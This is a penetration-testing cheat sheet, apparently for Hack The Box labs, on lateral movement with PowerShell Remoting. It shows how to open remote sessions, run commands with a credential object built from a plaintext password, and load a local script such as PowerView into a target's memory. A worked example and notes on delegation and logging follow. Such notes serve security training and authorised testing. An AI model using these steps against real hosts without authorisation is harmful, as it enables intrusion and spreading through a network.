
PowerShell Lateral Movement

PowerShell Remoting

Enable PowerShell Remoting on the current machine (needs local admin). This starts the WinRM service, registers the HTTP listener on TCP 5985 and adds the matching firewall rule; -Force suppresses the confirmation prompts. On a host whose active network profile is Public, add -SkipNetworkProfileCheck or the cmdlet fails.

Enable-PSRemoting -Force

Entering or starting a new PSSession (the account used must be a local Administrator, or a member of Remote Management Users, on the target). New-PSSession creates a persistent session object; Enter-PSSession gives an interactive prompt, either directly against a host or inside an existing session object.

$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name>
Enter-PSSession -Session $sess

RCE with PS Credentials

$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}

Import a PS script and execute its functions remotely

Create a persistent session with the credentials, then run the local script file inside it. -FilePath reads the script on the local side and executes its contents in the remote session, so any functions it defines stay available in that session (the file never has to be copied to the target). Note that -ComputerName and -Session are separate parameter sets of Invoke-Command and cannot be combined in one call.

$sess = New-PSSession -ComputerName <NameOfComputer> -Credential $cred
Invoke-Command -Session $sess -FilePath c:\FilePath\file.ps1

Interact with the session (the loaded functions can be called directly at the remote prompt)

Enter-PSSession -Session $sess

Executing Remote Stateful Commands

Create a new session

$sess = New-PSSession -ComputerName <NameOfComputer>

Execute command on the session

Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

Read the variable back in a second call. If the process list comes back, the session is stateful: variables, functions and modules set up in one Invoke-Command persist for later calls against the same $sess (this is not the case when using -ComputerName, which opens and tears down a temporary session per call).

Invoke-Command -Session $sess -ScriptBlock {$ps}
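The full flow from the steps above, as one added worked example (not from the original notes): reachability check, credentialed persistent session, loading a local script's functions into the remote runspace, proving that state survives between calls, and cleanup. The hostname, account, password and script path are placeholders to be replaced.

```powershell
# Added example for these notes; not the original author's code.
# $target, $username, $plain and $script are assumed placeholder values.
$target   = 'DC01.htb.local'           # assumed target hostname
$username = 'htb.local\svc_admin'      # assumed account that is a local admin on $target
$plain    = 'Password123!'             # assumed; in practice read this from a vault, not a script
$script   = 'C:\Tools\PowerView.ps1'   # assumed local script that defines functions

# 1. Confirm WinRM answers before spending credentials on it (Test-WSMan does not authenticate).
try {
    Test-WSMan -ComputerName $target -ErrorAction Stop | Out-Null
}
catch {
    throw "WinRM not reachable on $target (TCP 5985/5986 blocked or service stopped): $_"
}

# 2. Build the credential object and open one persistent session.
$secPass = ConvertTo-SecureString $plain -AsPlainText -Force
$cred    = New-Object System.Management.Automation.PSCredential($username, $secPass)
$sess    = New-PSSession -ComputerName $target -Credential $cred

# 3. Execute the local script inside the session. Functions it defines remain in the
#    session scope; the file itself is never written to the target's disk.
Invoke-Command -Session $sess -FilePath $script

# 4. List the functions that are now defined remotely (proves the script loaded).
$loaded = Invoke-Command -Session $sess -ScriptBlock {
    Get-Command -CommandType Function | Select-Object -ExpandProperty Name
}
"Functions now available in the remote session: $($loaded.Count)"

# 5. State persists between calls: assign in one Invoke-Command, read in the next.
Invoke-Command -Session $sess -ScriptBlock {
    $ps = Get-Process | Sort-Object WorkingSet64 -Descending | Select-Object -First 5
}
Invoke-Command -Session $sess -ScriptBlock {
    $ps | Format-Table Name, Id, WorkingSet64 -AutoSize
}

# 6. Optional interactive work: Enter-PSSession -Session $sess ; typing 'exit' returns
#    to the local prompt and leaves the session (and its loaded functions) alive.

# 7. Review open sessions, then tear this one down so the remote runspace is released.
Get-PSSession | Format-Table Id, ComputerName, State, Availability -AutoSize
Remove-PSSession -Session $sess
```

Two caveats worth remembering when using this: the remote session only holds the credentials for the first hop, so commands inside it that reach a third host (an SMB share, another WinRM target) will fail with an access denied unless CredSSP or Kerberos delegation is configured; and every call here leaves the usual WinRM and PowerShell logging (including script block logging, if enabled) on the target, so the loaded script contents are visible to defenders.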